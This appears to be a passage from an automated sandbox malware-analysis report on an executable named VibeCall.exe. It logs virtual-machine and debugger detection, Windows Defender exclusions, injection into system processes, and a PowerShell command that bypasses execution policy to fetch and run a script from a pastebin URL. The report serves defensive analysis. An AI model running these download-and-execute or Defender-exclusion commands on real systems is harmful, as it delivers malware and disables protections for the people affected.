                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\aisolution_vibecall_a.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 58FB83A
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 578B83A
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 533A83A
                      Source: C:\Users\user\Desktop\VibeCall.exeMemory allocated: 2C9BD3E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\VibeCall.exeWindow / User API: threadDelayed 1257Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeWindow / User API: threadDelayed 6956Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7320Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2343Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2945Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 450Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8311
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1265
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeAPI coverage: 0.0 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep count: 7320 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep count: 2343 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep count: 2945 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep count: 450 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep count: 8311 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep count: 1265 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: powershell.exe, 00000004.00000002.2025015923.0000020B7CD34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                      Source: aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: VibeCall.exe, 00000000.00000003.2214055798.0000030A56596000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2170638120.0000030A56576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll rm
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01424ED5 LdrInitializeThunk,VirtualFree,15_3_01424ED5
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01427D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01427D4D
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF0277 mov eax, dword ptr fs:[00000030h]15_3_02CF0277
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF0277 mov eax, dword ptr fs:[00000030h]15_2_02CF0277
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_006D0277 mov eax, dword ptr fs:[00000030h]16_3_006D0277
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_2_006D0277 mov eax, dword ptr fs:[00000030h]16_2_006D0277
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeCode function: 17_3_01782277 mov eax, dword ptr fs:[00000030h]17_3_01782277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 26_3_02FF0283 mov eax, dword ptr fs:[00000030h]26_3_02FF0283
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_3_02F00283 mov eax, dword ptr fs:[00000030h]32_3_02F00283
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 44_3_02A00283 mov eax, dword ptr fs:[00000030h]44_3_02A00283
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01427D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01427D4D
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0142800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_3_0142800F
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01434B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01434B0C
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_0062800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_3_0062800F
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_00627D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_3_00627D4D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_00634B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_3_00634B0C
                      Source: C:\Users\user\Desktop\VibeCall.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\aisolution_vibecall_a.exe "C:\Users\user\aisolution_vibecall_a.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"Jump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess created: unknown unknown
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0142781B cpuid 15_3_0142781B
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
